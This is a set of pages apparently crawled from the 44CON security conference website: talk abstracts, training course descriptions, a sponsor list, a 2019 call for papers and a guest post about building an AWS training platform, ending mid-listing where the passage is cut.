          One of the hottest topics in current crypto research is Post-Quantum Cryptography. This branch of cryptography addresses asymmetric crypto systems that are not prone to quantum computers.

          Virtually all asymmetric crypto systems currently in use (Diffie-Hellman, RSA, DSA, and Elliptic Curve Crypto Systems) are not Post-Quantum. They will be useless, once advanced quantum computers will be available. Quantum computer technology has made considerable progress in recent years, with major organisations, like Google, NSA, and NASA, investing in it.

          Post-Quantum Cryptography uses advanced mathematical concepts. Even if one knows the basics of current asymmetric cryptography (integer factorisation, discrete logarithms, …), Post-Quantum algorithms are hard to understand.

          The goal of this presentation is to explain Post-Quantum Cryptography in a way that is comprehensible for non-mathematicians. Five families of crypto systems (as good as all known Post-Quantum algorithms belong to these) will be introduced:

          Lattice-based systems:

          The concept of lattice-based asymmetric encryption will be explained with a two-dimensional grid (real-world implementations use 250 dimensions and more). Some lattice-based ciphers (e.g., New Hope) make use of the Learning with Error (LWE) concept. I will demonstrate LWE encryption in a way that is understandable to somebody who knows Gaussian elimination (this is taught at middle school). Other lattice-based systems (especially NTRU) use truncated polynomials, which I will also explain in a simple way.

          Code-based systems:

          McEliece and a few other asymmetric ciphers are based on error correction codes. While teaching the whole McEliece algorithm might be too complex for a 44CON presentation, it is certainly possible to explain error correction codes and the main McEliece fundamentals.

          Non-commutative systems:

          There are nice ways to explain non-commutative groups and the crypto systems based on these, using everyday-life examples. Especially, twisting a Rubik’s Cube and plaiting a braid are easy-to-understand group operations a crypto system can be built on.

          Multivariate systems:

          Multivariate crypto can be explained to somebody who knows Gaussian elimination.
          Hash-based signatures: If properly explained, Hash-based signatures are easier to understand than any other asymmetric crypto scheme.
          I will explain these systems with cartoons, drawings, photographs, a Rubik’s Cube and other items.

          In addition, I will give a short introduction to quantum computers and the current Post-Quantum Crypto Competition (organised by US authority NIST).

          Security module for php7 – Killing bugclasses and virtual-patching the rest!

          Presented by: Julien Voisin and Thibault Koechlin

          Suhosin is a great PHP module, but unfortunately, it’s getting old, new ways have been found to compromise PHP applications, and some aren’t working anymore; and it doesn’t play well with the shiny new PHP 7. As a secure web-hosting company, we needed a reliable and future-proof solution to address the flow of new vulnerabilities that are published every day. This is why we developed Snuffleupagus, a new (and open-source!) PHP security module, that provides several features that we needed: passively killing several PHP-specific bug classes, but also implementing virtual-patching at the PHP level, allowing to patch vulnerabilities in a precise, false-positive-free, ultra-low overhead way, without even touching the applications’ code.

          Reverse Engineering and Bug Hunting on KMDF Drivers

          Presented by: Enrique Nissim

          Numerous technical articles, presentations, and even books exists about reverse engineering the Windows Driver Model (WDM) for purposes that vary from simply understanding how a specific driver works, to malware analysis and bug hunting. On the other hand, Microsoft has been providing the Kernel Mode Driver Framework (KMDF) for quite a while and we now see more and more drivers shifting to this framework instead of interacting directly with the OS like in the old WDM times. Yet, there is close to no information on how to approach this model from a reverse engineering and offensive standpoint.
          In this presentation, I will first do a quick recap on WDM drivers, its common structures, and how to identify its entry points. Then I’ll introduce KMDF with all its relevant functions for reverse engineering through a set of case-studies. I’ll describe how to interact with a KMDF device object through SetupDI api and how to find and analyze the different IO queues dispatch routines. Does the framework actually enhances security? We’ll come to a conclusion after revealing some major vendor implementation problems.
          Armed with this knowledge, you will be able to run your own bug hunting session over any KMDF driver.

           

          Also check our list of Workshops for 44CON 2018.

          %d bloggers like this:
          #####EOF##### Facebook
          Log into your Facebook account to share.
          Создать аккаунт
          #####EOF##### Partager un lien sur Twitter

          Partager un lien avec vos abonnés

          Nouveau sur Twitter ?

          Obtenez des mises à jour instantanées de vos amis, d'experts dans votre domaine, de vos célébrités préférées et de tout ce qui se passe dans le monde.

          Qu'est-ce que Twitter ? En savoir plus.

          #####EOF##### Facebook
          Log into your Facebook account to share.
          Create New Account
          #####EOF##### Facebook
          Log into your Facebook account to share.
          Create New Account
          #####EOF##### Archive – 44CON

          Archive

          Over the years we’ve run a lot of 44CON conferences and other events too. If you’re looking for something specific the search engine may be able to help. Here’s a list of what we’ve done over time.

          2019

          2018

          2017

          2016

          2015

          2014

          2013

          2012

          2011

          Our records, like our memories are hazy. Some talks are up on our YouTube channel.

          A list of all previous speakers can be found here. Thanks to every one of them for speaking at our events.

          #####EOF##### 44CON 2012 Sponsors – 44CON

          44CON 2012 Sponsors

          MWR InfoSecurity

          MWR InfoSecurity

          http://www.mwrinfosecurity.com

          MWR are honoured to be involved with 44CON again this year. After the outstanding success of the inaugural 44CON event last year we are confident that the 44CON team behind the UK’s premier security conference will go on to deliver an even more amazing event this year!

          blackberry

          RIM

          http://www.blackberry.com/security

          Research In Motion (RIM) revolutionized the mobile industry with the introduction of the BlackBerry® solution in 1999. BlackBerry Security is a world class organization working to make BlackBerry one of the most secure mobile platforms available by providing an end to end security focus.

          elcomsoft

          Elcomsoft

          http://www.elcomsoft.com/

          ElcomSoft Co Ltd is a world-leader in computer and mobile forensics, having pioneered numerous cryptologic techniques and providing a range of tools, training and consulting services to law enforcement, corporate and intelligence agencies.

          raytheon

          Raytheon

          http://www.raytheon.com

          Raytheon has more than 30 years of experience securing some of the world’s most critical and sensitive programmes and systems. We work in some of the most demanding cyber security and intelligence environments in the world and bring our customers the capabilities and cyber business change to ensure they stay ahead of threats. We look at ways organisations can actively disrupt the command and control of an adversary within their domain; the focus is not purely on a layered defence.

          carbon-black

          Carbon Black

          http://www.carbonblack.com

          Carbon Black is a surveillance camera for your computer – always recording so you know precisely what happened and where. The “camera” collects and retains five key elements as they are occurring: records of execution; filesystem modifications; registry modifications; new outbound network connections and unique binaries – as well as the relationship among them.

          sourcefire-logo

          SourceFire

          http://www.sourcefire.com

          Sourcefire is a market leading provider of intrusion detection systems and vulnerability analysis. Sourcefire’s Agile Security vision is defining a new, essential and more effective approach for organisations to protect themselves against today’s security realities

          nccgroup

          NCC Group

          http://www.nccgroup.com

          NCC Group is a leading global information assurance firm, providing freedom from doubt that all critical material is available, protected, and operating as it should be at all times. Information assurance is delivered through escrow and verification, security testing, audit and compliance, software testing and web performance services.

          sensepost

          SensePost

          http://sensepost.com

          The lack of a world-class security conference in the UK has finally been filled by 44CON. No longer does the UK infosec community have to go overseas to see security researchers present cutting-edge research and ideas. SensePost is proud to be associated with 44CON.

          44CON Supporters
          tigerscheme

          TigerScheme

          http://www.tigerscheme.org/

          Founded in 2007 on the principle that a commercial certification scheme run on independent lines would give buyers of security testing services confidence that they were hiring a recognised and reputable professional, Tiger Scheme is now the UK’s leading independent, University-recognised certifier of vulnerability testing and digital forensics skills within the UK.

          crest1

          CREST

          http://www.crest-approved.org

          CREST is a not for profit organisation that serves the needs of an information security marketplace that requires the services of a regulated and professional security testing.

          checksec-logo

          CheckSec

          https://www.checksec.com

          CheckSec is a UK based provider of security services and technologies, with a global focus. We provide services and solutions to help our customers manage their security requirements. Our customers include security consultancies and security consumers based in Europe, the US, Africa and the Middle East.

          itc-logo

          ITC Security

          http://www.itcsecurity.com/

          Founded in 1995, ITC are a network and security integrator providing businesses with assured IT. We design, build, optimise and manage your Network & Security infrastructures, enhancing network performance, safeguarding information and simplifying management. At the core of ITC is our dedicated Secure Operations Centre (SOC) in London, where we have developed and deliver NetSure360°. This unique service integrates management of our customers Network & Security infrastructures providing them with complete visibility, control and assurance through real time performance dashboards and risk analysis.

          mandalorian

          Mandalorian

          http://www.mandalorian.com

          Mandalorian are an independent UK-based provider of information security services with specialisms in penetration testing and malware analysis. We focus on being the easiest supplier you’ve ever worked with and being fanatical about the quality of our work.

          alien8
          #####EOF##### DSC_4936-1 – 44CON

          DSC_4936-1

          #####EOF##### Tickets for 44CON 2016 are on sale – 44CON

          Tickets for 44CON 2016 are on sale

          44CON 2016 tickets are now on sale in our shop go and get yours now!

          We also have 4 great training courses by Saumil Shah, Dawid Czagan, Joe FitzPatrick, Dominic Chell and Marcus Pinto, go check them out and book your place early to avoid disappointment as courses will be cancelled if minimum numbers are not reached 3 weeks before the conference.

          44CON is the UK’s premier annual technical security conference and training event. 44CON 2016 will be taking place from the evening of the 14th September until the 16th September at the ILEC Conference Centre, you can expect a jam packed few days of awesome talks, food and of course alcohol. 

          Our CFP closes tonight (Friday 10th June) so if you have something awesome to share get it in now before it’s too late.

          Finally, check this great day out at the Farnborough International Air Show from our friends at Suits & Spooks on 14th July, Counterespionage: the need for speed, and use the code 44CON for a 5% discount on both package options.

          #####EOF##### 44CON 2017 Training – 44CON

          44CON 2017 Training

          All training courses will be run between the 11th and 13th September 2017 at etc venues The Hatton except Saumil Shah’s course which will run at etc venues Marble Arch and Brian Butterly & Hendrik Schmidt’s course which will take place at a venue to be confirmed.

          Presented by: Ashfaq Ansari

          This training is focused on exploitation of different Windows Kernel Mode vulnerabilities. We will cover basics of Windows Kernel Internals and hands-on fuzzing of Windows Kernel Mode drivers.

          We will dive deep into exploit development of various kernel mode vulnerabilities. We will also look into different vulnerabilities in terms of code and the mitigations applied to fix the respective vulnerabilities.

          This training assumes that the attendees have less or no prior experience with Windows Kernel Internals and Kernel land as well as User land exploitation techniques.

           Course Length: 3 days (11th-13th September 2017)

          Presented by: Dominique C. Brack

          This is the first time Social Engineering Engagement Framework (SEEF) author offers an in-person public workshop. Normally the workshops and briefings are closed-group private enterprise or Government only workshops. Profit from first-hand knowledge and experience of a social engineering and information security professional with 20 years of experience. What you will learn: Tools and techniques to plan, execute and manage social engineering engagements. What can and will be used against you, your employees and your organization. This training will provide the skills to detect, defend and assess social engineering attacks and the associates risk with it. You will learn the motivations and methods used by social engineers enabling you to better protect yourself and your organization.

          Course Length: 2 days (12th-13th September 2017)

          Brian Butterly & Hendrik Schmidt

          The course is oriented around a few common market devices: GPS trackers, automotive trackers with immobilizers, smart meters and small scale industrial control systems. While demonstrations will be performed on the actual devices, the attendees will work on cellular development boards which basically emulate the behavior identified on the practical device. To be able to use actual cellular communications basestations, custom SIM cards and basic VMs will be provided, together with a cable setup which offers a simple solution for circumventing potential legal issues.

           Course Length: 3 days (11th-13th September 2017)

          Presented by: Luca Carettoni

          Ensuring the security of web applications in continuous delivery environments is an open challenge for many organizations. Traditional application security practices slow development and, in many cases, don’t address security at all. Instead, a new approach based on security automation and tactical security testing is needed to ensure important components are being tested before going live. Security professionals must master their tools to improve the efficiency of manual security testing as well as to deploy custom security automation solutions.

          Based on this premise, we have created a brand-new class taking advantage of Burp Suite – the de-facto standard for web application security. In two days, we show you how to use Burp Suite’s extension capabilities and unleash the power of the tool to improve efficiency and effectiveness during security audits.

          Course Length: 2 days (12th-13th September 2017)

          Presented by: Joe FitzPatrick

          This course introduces and explores attacks on several different relatively accessible interfaces on embedded systems. Attendees will get hands-on experience implementing and deploying a number of low-cost hardware devices to enable access, privilege, and deception which is in some cases imperceptible from software.We’ll examine UART, JTAG and SPI interfaces on embedded devices, representative of a wide range of embedded devices that span consumer electronics, medical devices, industrial control hardware, and mobile devices. We will observe, interact with, and exploit each interface to use physical access to enable software privilege.

          Course Length: 2 days (12th-13th September 2017)

          Presented by: Erik Hjelmvik

          The network forensics training class consists of a mix of theory and hands-on labs, where students will learn to analyze Full Packet Capture (FPC) files. The scenarios in the labs are primarily focused at network forensics for incident response, but are also relevant for law enforcement/internal security etc. where the network traffic of a suspect or insider is being monitored.

          Course Length: 2 days (12th-13th September 2017)

          Presented by: Nikhil Mittal

          Penetration Tests and Red Team operations for secured environments need altered approaches. You cannot afford to touch disk, throw executables and use memory corruption exploits without the risk of being ineffective as a simulated adversary. To enhance offensive tactics and methodologies, PowerShell is the tool of choice.

          PowerShell has changed the way Windows networks are attacked. It is Microsoft’s shell and scripting language available by default in all modern Windows computers. It could interact with .Net, WMI, COM, Windows API, Registry and other computers on a Windows Domain. This makes it imperative for Penetration Testers and Red Teamers to learn PowerShell.

          This training is aimed towards attacking Windows network using PowerShell and is based on real world penetration tests and Red Team engagements for highly secured environments. The course runs as a penetration test of a secure environment with detailed discussion and use of custom PowerShell scripts in each phase.

           Course Length: 3 days (11th-13th September 2017)

          Presented by: Marcus Pinto, MDSec

          The Web Application Hacker’s Handbook (WAHH) Series is the most deep and comprehensive general purpose guide to hacking web applications that is currently available. This course is a practical opportunity to take the skills and theory taught in the book to the next level, experimenting with all of the tools and techniques against numerous vulnerable web applications and labs, under the guidance of the book’s authors. The course also includes new material from the second edition of WAHH, bringing the course right up to date with the latest attacks.

          Course Length: 2 days (12th-13th September 2017)

          Presented by: Saumil Shah

          ARM has emerged as the leading architecture in the Internet of Things (IoT) world. The all new ARM IoT Exploit Laboratory is a fast paced 3-day intermediate level class intended for students who want to take their exploit writing skills to the ARM platform. The class covers everything from an introduction to ARM assembly all the way to Return Oriented Programming (ROP) on ARM architectures. Our lab environment features hardware and virtual platforms for exploring exploit writing on ARM based Linux systems and IoT devices.

          The class concludes with an end-to-end “Firmware-To-Shell” hack, where we extract the firmware from a popular SoHo router, build a virtual environment to emulate and debug it, and then use the exploit to gain a shell on the actual hardware device.

           Course Length: 3 days (11th-13th September 2017)

           

          Book your 44CON 2017 training course now!

          #####EOF##### 44CON CFP 2019

          44CON 2019 Call For Papers

          This is the Call for Papers for the 9th Annual 44CON security conference, held from the 11th to 13th of September, 2019 at the ILEC Conference Centre, Lille Road, London. We invite jaded cynics, pessimists, optimists and opportunists to come together and join our broad church where the latest research of the day will be discussed, debated and debased.

          44CON has two main talk tracks, a workshop track and several breakout areas including a village hall expo track, a mental health village and a village pub. Additionally, 44CON will host the ManyHats Club meetup on the evening of Thursday 12th September, which will feature it's own separately organised talks. The CFP covers the two main talks and workshop tracks only.

          Purchase early bird tickets (capped at 50) or sign up to our mailing list to be notified when regular tickets go on sale.

          If you have any pressing queries or concerns, please get in touch.

          Submissions for technical and infosec professional presentations & workshops will be accepted. Presentations are 45 minutes long with 5 minutes for Q&A. Workshops are 1-2 hours long including setup/breakdown time.

          • A presentation on the main tracks is in front of a seated audience.
          • A Workshop is like a mini training course - e.g. a 2 hour walk through Windows Kernel internals and local privilege escalation opportunities.

          Talks are filmed. Workshops are not.

          In particular, we are looking for original talks of the highest quality in the following areas:-

          Note: this is not an exhaustive list. If you have a good talk proposal, please submit it for consideration.

          • Offensive security talks for the advanced Pentester or Red Teamer
          • Defensive talks for SOC analysts, threat hunters or enthusiastic amateur defenders
          • Talks on bugs, bug classes, finding and fixing security bugs
          • Incident Handling, Forensics and Anti-Forensics
          • Virtualisation, Container, and Cloud Computing Security
          • Cryptography, Cryptocurrencies, Cryptozoology and other Crypto-fu
          • Hardware attacks and defence tools, techniques and practices
          • Application and Mobile Security
          • Networking, Comms, Critical National Infrastructure (CNI)
          • Cyberspace, Policing, Law, Interception and Human Rights

          Priority is generally given to new presentations over those presented elsewhere. If you have a presentation that you have given or will give elsewhere prior to 44CON London in September and wish to submit, please let us know in your submission, and inform us of any changes you intend to make for 44CON London.

          If your talk or workshop is new, please let us know the details of other conference(s) to which you have or intend to submit through the CFP system.

          It's extremely hard for a talk to get accepted to 44CON because of the small number of slots compared to the volume of high quality submissions. If your submission is not accepted, it's not a rejection of you as a speaker (except in extreme cases, in which case we'll tell you). To boost your chances, take a look at how to game the CFP and some detail on how our CFP process works.

          All 44CON speakers will be entitled to the following:

          • 2-3 nights accommodation (see below)
          • Breakfast & Lunch during conference
          • Love and TLC from our awesome speaker ops team
          • Event access for both days, all nights and pre/post event drinks
          • This year we're running a Speaker's English Wine tasting (yes, you read that right) session
          • We also have a small event on the Tuesday evening that speakers are welcome to attend

          Accepted primary presentation speakers get the following:

          • Paid travel (for primary speaker outside of Fulham, Putney or Central London)
          • 2 nights of accommodation for the primary speaker (normally the Wednesday and Thursday nights)

          Accepted primary presentation speakers also presenting a workshop get the following:

          • Paid travel (for primary speaker outside of Fulham, Putney or Central London)
          • 3 nights of accommodation for the primary speaker (normally the Wednesday,Thursday and Friday nights)

          Accepted primary workshop presenters without an associated talk get the following:

          • 2 nights of accommodation for the primary speaker (normally the Wednesday and Thursday nights)
          • Travel is not covered

          In 2018 we had speakers from the UK, Australia, China, the USA, South Africa, Europe, The Middle East and more.

          We welcome speakers of all genders, origins and physical abilities. If you have any particular requirements please tell us so we can accommodate them. We are a non-alcoholic, Coeliac, Vegan, Kosher, Halal and Gluten-free friendly event. Talks are to be delivered in English, only. Partners are welcome to come along and we're happy to help arrange for tourist things for you and your partners to do while in London. Please let us know should you want to do this, so we can make your time here memorable.

          Official CFP open:Tuesday 26th February 2019
          Final CFP deadline:Tuesday 30th April 2019, 23:59pm UTC
          First accept notifications:Monday 27th May 2019
          Speaker notifications start:Monday 3rd June 2019
          Speaker announcements start:Wednesday 5th June 2019 @ BSides London 2019
          Speaker flight details to be submitted by:Friday 19th July, 2019
          Papers/Tools/Presentation submission deadline:Friday 30th August 2019
          44CON Training9th-11th September 2019
          44CON Conference11th-13th September 2019
          #####EOF##### 44CON 2017 Schedule Available. – 44CON

          44CON 2017 Schedule Available.

          Here you go folks the 44CON 2017 schedule is now available here.

          Go take a look at all the wonderful talks and workshops we have lined up for you! As with all things the schedule could be subject to some last minute changes so make sure you keep an eye out on the day so you don’t miss out.

          If you have’t got your ticket yet there are some still available here.

          We look forward to seeing you all in September.

          #####EOF##### Building an AWS and Azure security training platform – 44CON

          Building an AWS and Azure security training platform

          This is a guest post by one of our trainers, Paul Schwarzenberger. Paul is running the fantastic Cloud Security and Devops training course this June. He also has a blog where he talks about AWS, Cloud Security and DevOps. This is part of a series on how he’s built a platform to make things easier for those attending his training. Thanks, Paul!

          Part 1 – Proof of Concept

          The Cloud Security and DevSecOps training course I’m delivering for 44CON in June includes AWS, Azure and GitHub accounts which the students use so they don’t need to create their own.

          Wouldn’t it be great if students could turn up with any laptop, or even an iPad, and do the course. And the time spent on the labs would be used to learn about cloud security and DevSecOps, not debugging software installation issues.

          When I’ve delivered similar courses in the past, students brought their own laptops and installed the software they needed for the hands-on AWS and Azure security labs, either in advance or during the course.

          For this course, Steve suggested I create a YouTube video showing how to install the various software needed, and that got me thinking – wouldn’t it be great if students could turn up with any laptop, or even an iPad, and do the course. And the time spent on the labs would be used to learn about cloud security and DevSecOps, not debugging software installation issues.

          So I started looking at building a training platform which students can use – and as this is a cloud security course, what better place to do this than in the cloud?

          First step was a proof of concept – so I created some Amazon WorkSpaces instances in the cloud, manually using the AWS console, and started installing software.

          Within 30 minutes, I had created two virtual desktops in the cloud – one Windows, the other Linux, and connected to each in turn with the Amazon WorkSpaces client from my laptop. The user experience was really good – even when connecting over mobile data. Then I installed the software I needed for the course, tested it, and created workspace bundles to be used as images for future builds. I created new WorkSpaces from the bundles to make sure that they came up correctly with all the software preinstalled and configured.

          So I’ve successfully proved the concept – the next step is to develop a design for a solution which could be used for 10 – 20 students, with full automation for building and tearing down the training environment immediately after the course – to avoid unnecessary bills!

          This is the design I came up with, after doing some research on Amazon WorkSpaces and AWS Directory Services:

          AWS Directory Services has several options, the one I selected was Microsoft Active Directory Standard Edition, which can be used with both Windows and Linux Amazon WorkSpaces.

          As this is a cloud security course, it’s important that the design isn’t just functional, but also demonstrates secure cloud architectures.

          The design includes:
          • Virtual Private Cloud (VPC) with private address space
          • private user subnets, containing the AWS managed Active Directory domain controllers and the WorkSpaces, with no route to the Internet
          • public DMZ subnets for outbound access to the Internet using NAT Gateways
          • Windows Server 2016 instance for administration and setup of the Active Directory domain, users and groups
          • Security group on the admin server only allowing inbound remote desktop access from a single IP address.

          If you’re wondering how the Amazon WorkSpaces client connects via the Internet, that’s not shown on this diagram, as it’s managed by AWS via a second network interface on each WorkSpace virtual desktop.

          The next step is to set up a new AWS account for the training platform. I’ll cover that in the next Blog post.

          Paul’s Cloud Security and DevOps Workshop course runs on the 6th and 7th of June.

          Book now

          #####EOF##### Share a link on Twitter

          Share a link with your followers

          New to Twitter?

          Get instant updates from your friends, industry experts, favourite celebrities, and what's happening around the world.

          What is Twitter? Learn more.

          #####EOF##### Share a link on Twitter

          Share a link with your followers

          New to Twitter?

          Get instant updates from your friends, industry experts, favourite celebrities, and what's happening around the world.

          What is Twitter? Learn more.

          #####EOF##### 44CON 2012 Presentations – 44CON

          44CON 2012 Presentations

          44Con 2012 has two tracks, with different themes depending on the day. Day 1 is Fast track day, consisting of an info sec track covering the softer and more business-focused side of security and a turbo track, containing full info sec talks and busy reader turbo talk editions of the next two day’s research, pitched at managers and advisors who might not have the time or technical focus for the full talks, but may need to take action based on the research being presented.

          The second and third days consist of technical talks. Where possible, more hard-core or less accessible but technically interesting talks will be paired with more accessible talks.

          As well as this, workshops will run across all three days pitched at their respective audiences.

          The talks listed below are split into the first day and the remaining two, so that when it comes to buying tickets you’ll know what to expect. More talks will be added as they’re accepted. The Call For Papers closed at the end of May 2012.

          Day 1 talks

          Software Security Austerity – Software security debt in modern software development

          Presented by: Ollie Whitehouse

          What happens when you’ve implemented your SDLC or started your security mindfulness activities and got good at finding security issues? Typically you won’t be able to fix them all and as a result you start to accrue vast amounts of known security debt. This is compared to doing another and having large amounts of latent security debt.

          The concept of technical debt within software was first introduced in 1992 by Ward Cunningham. This presentation outlines the general problem of software (or application) security debt while also outlining a number of considerations and strategies for managing the problem. The presentation will discuss the business realities when dealing with security debt, how these realities can be balanced and why there are parallels with the recent financial austerity measures we’ve seen and what we should learn from recent events.


          Securing the Internet: YOU’re doing it wrong (An INFOSEC Intervention)

          Presented by: Jayson E. Street

          YAY I broke________<-Insert protocol, device, OS or Internet if you’re Dan.

          My question though is great! Now how do we not go about fixing it but actually go about communicating these issues to upper management & end users? I will talk about three points

          1. Getting upper management involved and behind your security initiatives.
          2. Educating, empowering & enforcing your workforce to be a part of your INFOSEC team not the core weakness of it.
          3. How the INFOSEC echo chamber is not helping the situation and how we can take a moment from being awesomely right to being helpful and gracious.

          Security Architecture & SMART

          Presented by: Phil Huggins

          Security Architecture & SMART

          What is security architecture?

          Security architecture principles and approaches

          What are the SMART concerns?

          How can you address those in your security architecture?


          Terrorism, tracking, privacy and human interactions

          Presented by: Daniel Cuthbert, Glenn Wilkinson

          Numerous governments have initiated (or already deployed) plans to monitor citizens’ online activity. The monitoring ranges from mobile phone calls and SMS messages, to email, social network interaction, and general browsing habits. Such initiatives are touted under the guise of “anti-terrorism” – with governments advocating its necessity for state security. State security bodies propose access to massive databases detailing citizens habits – and from such raw data they anticipate the ability to profile suspected terrorist behavior.

          Our project goal is to create a similar database (on a much smaller scale) in order to determine both the feasibility of profiling citizens.  In order to achieve such monitoring numerous wireless access points (APs) will be setup in several cities.


          I’m the guy your CSO warned you about

          Presented by:  Gavin Ewan

          Although you may find the following questions simple to answer, ask yourself this –

          Have you read an e-mail recently?

          – Can you be sure everything is as it seems?

          Had a conversation on the phone?

          – Was that really your bank on the line?

          Have you ever clicked a link?

          – Did that go where you expected?  You sure?

          Have you ever plugged in a USB stick?

          – Who had it before you?

          Too many speak of the importance of what hand you use to hold a pen or what direction your eyes look when accessing your brain being some metric in gauging how people fall victim to social engineering.

          Very good, thanks for that, but so what?

          Psychology won’t defend you against google hacking, whether you hold a pen with your right or left hand doesn’t make your public image any more secure.  This talk focuses on the ‘hypothetical bad guy’ and the ‘weapons’ of choice he has in front of him.

          In this talk I will take you through the main arsenal of weapons the bad guy has at his disposal.  Gone are the maybes, probablys and percentages of the population given to us by pure psychology.  In are the real tools of pwnage the bad guy will use without ever having to wear a boiler suit and a fake moustache.

          The talk will include demos of the tools being used and leave attendees with enough information to know how to implement these attacks themselves and better able to defend against them.

          The aim of this talk is to raise awareness of how much damage a bad guy can do with only a handful of tools and an internet connection, social engineering for the modern age.


          SexyDefense – Maximizing the Home-Field Advantage

          Presented by: Ian Amit

          Offensive talks are easy, I know. But the goal of offensive security at the end of the day is to make us better defenders. And that’s hard. Usually after the pentesters (or worst – red team) leaves, there’s a whole lot of mess of vulnerabilities, exposures, threats, risks and wounded egos. Now comes the money time – can you fix this so your security posture will actually be better the next time these guys come around?

          This talk focuses mainly on what should be done (note – no what should be BOUGHT – you probably have most of what you need already in place and you just don’t know it yet).

          The talk will show how to expand the spectrum of defenders from a reactive one to a proactive one, will discuss ways of performing intelligence gathering on your opponents, and modeling that would assist in focusing on an effective defense rather than a “best practice” one. Methodically, defensively, decisively. Just like the red-team can play ball cross-court, so should you!


          Why Integrity is left alone and not given TLC (Tender, Love and Care) it deserves?

          Presented by:  Jitender Arora

          Information Security has 3 pillars CIA (Confidentiality, Integrity and Availability). Most organisations spend quite a lot of money in putting Confidentiality (Encryption to secure data in transit or data at rest) and Availability (Disaster Recovery) controls within their environment. For some reason, Integrity controls have been neglected and not many organisations implement Integrity controls to guarantee data accuracy.

          Most business processes rely on accuracy of data to take critical and key business decisions but still mostly it is considered adequate to protect confidentiality of data in transit between 2 nodes or systems. How can we ensure Integrity of data that is used in BI tools to make decisions on critical business propositions? Is it acceptable to rely on Encryption controls to guarantee Integrity of data?

          • Explaining importance of Integrity with some real life use cases from Industry
          • Providing pragmatic options on Integrity Controls

          The idea is to have a thought provoking discussion involving audience.


          House of cards – How not to collapse when bad things happen

          Presented by: Rafal Los

          An unfortunate number of enterprises build their foundations on a false sense of security.  They’ve implemented technical defensive measures, written policies, and have procedures for response – and they feel ‘secure’.  The problem is – until they’ve actively tested these out in real-world scenarios much like disaster recovery drills, they have no idea how well-prepared they really are for when the worst strikes. Perhaps more importantly, they have no idea where things will strain and break and as a result cannot compensate.

          As Information Security leaders often find themselves playing whack-a-mole with compliance, business requirements and resource challenges it can be easy to fall into a sense that everything is under control because on paper the security posture looks good – but how certain are you?  Validating human and technical controls, policy elements and response procedures is vital to the prepared enterprise.  It is true that the only way to design a safe vehicle is to repeatedly crash and re-design it until it meets minimum safety requirements, but all of this must be done before the car is allowed to crash in a real wreck.  Unfortunately, most enterprises simply go by what they’ve planned on paper and it’s not until they wreck in the real world do they find out how poorly prepared they are.

          This talk will expose the audience to the issues of having unproven security and untested defenses in today’s threat landscape… and encourage CISOs to “break more” to provide their leadership with a better level of assurance of preparedness than they have today.  We will provide a framework and step-by-step plan to design, test, and learn from ‘crash data’ to build a truly resilient, responsive and ultimately more risk-averse enterprise.


          Day 2 and 3 talks

          Hacking and Forensics on the Go

          Presented by: Phil Polstra

          This talk with discuss “The Deck” which a BeagleBoard configured for hacking and forensics on the go.  The Deck will run an Ubuntu-based linux OS with many of the nice tools from Backtrack also present.  Some of the planned BT tools include: wireshark, Metasploit (complete with backend database), Jack the Ripper, remote access tools, nmap, and wifi tools.

          I will also discuss a couple of ways to power the Deck using some simple circuits.  Powering options will include USB plugin (which would also allow use of popular USB wall chargers), 9V battery with appropriate circuitry, and Power-Over-Ethernet.

          For those only interested in a forensic device, I will present the 4Card.  The 4Card is a forensics device based on the BeagleBone.  The BeagleBone isn’t powerful enough to use a an attack computer, but it is smaller, cheaper, and consumes less power for those that don’t need an attack platform.


          V-SAT hacking

          Presented by: Paul Marsh

          Following on from 44con 2011’s presentation on ‘Satellite Hacking’ this one will concentrate purely on V-Sat hacking, interception and decoding of data. Packet injection will be covered at a high level. The presentation will cover V-Sat topology and real-word implementations, data transmission formats and parsing of off-air data using well known network sniffing tools. Numerous examples will be given of actual off-air signals as well as practical advice on decoding.


          Big game hunting

          Presented by: Tim Brown

          Simple techniques for bug hunting on big iron UNIX.  The talk will build on the work previously done in my “Breaking The Links” paper but will focus on AIX and associated IBM products.  The talk will include some new bugs as well as going through a simple methodology for finding them.


          Inside .NET smart card operating system

          Presented by: Behrang Fouladi

          Reverse engineering methods in hardware and software domains have been demonstrated to dump or model smart cards operating system or on-card applications source code. The hardware reverse engineering methods require specialized equipment and silicon level skills and are generally used by attackers to extract encryption keys or key derivation algorithms which are not the topic of this talk. Instead, I will mainly use code reverse engineering of the vendor’s software development kit (SDK) and card-host communication analysis to document card application file format and relevant runtime bytecode instructions which can then be used to produce effective test cases targeting the interesting instructions of the on-card .NET virtual machine.


          Cryptanalysis of the Enigma Machine

          Presented by: Bob Weiss and Ben Gatti

          The Enigma machine was broken during WWII using an Electro Mechanical device and cribs (or known plaintext.)  A ciphertext only cryptanalysis method for breaking the Enigma was proposed by James Gillogly in 1995, but until now software to implement this type of attack has not been available.  We expect to release software that implements a modified version of what Gillogly proposed.


          DGA Detection & Optimization

          Presented by: Gunter Ollman

          The concept behind domain generation algorithm (DGAs) use for locating crimeware C&C isn’t particularly new, however the current generation as considerably better tuned than those of old and are increasingly incorporated as a backup strategy to the more sophisticated commercial crimeware tools. For the good guys, there are new machine learning and advanced spectral clustering approaches that can automatically detect (passively at the network level) their operation and classify malware families. For the bad guys, there are improved operational methods that guarantee evasion – at both technological and law enforcement levels. This talk covers the state of the art in applying advanced machine learning to network detection, and the optimizations being made by the masterminds behind some of the best crimeware out there.


          Passive IPS Reconnaissance and Enumeration – false positive (ab)use

          Presented by: Arron Finnon

          Network Intrusion Prevention Systems or NIPS have been plagued by “False Positive” issues almost since their first deployment.  A “False Positive” could simply be described as incorrectly or mistakenly detecting a threat that is not real.  A large amount of research has gone into using “False Positive” as an attack vector either to attack the very validity of an IPS system or to conduct forms of Denial of Service attacks.  However the very reaction to a “False Positive” in the first place may very well reveal more detailed information about defences than you might well think.

          This talk takes a looks at how its is possible to enumerating network defences such as an IPS by very simple and effective means.  A detection system such as an IPS reacting to a set of conditions under the control of an attacker can very well allow them to know what defences they need to overcome to be successful.  With a simple crafted email it is possible to tell that clamAV is running on a mail server, or a  simple fake URL parameter could well inform you that SNORT is defending a web application.  Armed with this type of information an attacker can plan their attack that utilise IPS evasion techniques.  All though this talk uses some very famous “Open Source” security application in its examples the  methodology can easily be used to detect a whole host of commercial security products as well.

          There is no hard and fast simple fix to the issues discussed in this talk, the aim is simple; to give the attendees the ability to spot and assess potential “reaction leakages” from a detection system.  You can only really defend against what you can understand and with this information a more fitting solution can be sought.


          Hardware security resilience to low-cost attacks

          Presented by: Sergei Skorobogatov

